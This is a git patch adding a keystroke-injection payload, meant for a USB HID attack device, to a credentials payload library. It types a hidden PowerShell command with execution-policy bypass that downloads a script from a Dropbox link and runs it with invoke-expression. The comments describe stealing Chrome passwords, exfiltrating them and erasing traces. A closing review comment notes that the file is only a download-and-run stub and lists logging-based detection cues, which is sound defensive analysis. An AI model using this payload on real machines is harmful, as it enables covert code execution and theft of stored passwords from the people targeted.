From bf506c8368ff23dd067f59daa6904d35f8fb79f9 Mon Sep 17 00:00:00 2001
From: "DIYS.py" <110927141+DIYSpy@users.noreply.github.com>
Date: Wed, 10 Aug 2022 21:05:47 -0400
Subject: [PATCH] Create payload.txt
---
.../payload.txt | 28 +++++++++++++++++++
1 file changed, 28 insertions(+)
create mode 100644 payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt
diff --git a/payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt b/payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt
new file mode 100644
index 0000000..bc58d69
--- /dev/null
+++ b/payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt
@@ -0,0 +1,28 @@
+#########################################################################################################
+# | #
+# Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
+# Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
+# Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
+# Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
+# Target : Windows 10 | |____/___| |_| |____(_) .__/ \__, | #
+# Mode : HID | |_| |___/ #
+# Props : I am Jakoby, NULLSESSION0X | #
+# | #
+#########################################################################################################
+
+REM Title: Browser-Passwords-Dropbox-Exfiltration
+REM Author: DIYS.py
+REM Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.
+REM Then it cleans up traces of what you have done after.
+REM Target: Windows 10 (PowerShell + Chrome)
+REM Version: 1.0
+REM Category: Credentials, Exfiltration
+
+
+DELAY 3000
+GUI r
+DELAY 250
+STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
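Review bot: The REM Description lines claim this payload grabs Chrome passwords, uploads them and cleans up afterwards, but nothing in the added file does any of that: the only action is the STRINGLN line, which fetches whatever the placeholder link returns and hands it to `invoke-expression`. The script that actually runs is not part of this commit, so it cannot be reviewed here and can change after merge without any diff. I would state that in the file, e.g. `REM This file is only a download-and-run stub; the collection, upload and clean-up logic lives in a separate script that is not included here.` For triage on the defensive side, the observable on that line is a Run-dialog launch of `powershell -w h -NoP -NonI -Exec Bypass` with `iwr` feeding `invoke-expression`, which process command-line auditing and PowerShell script block logging both record.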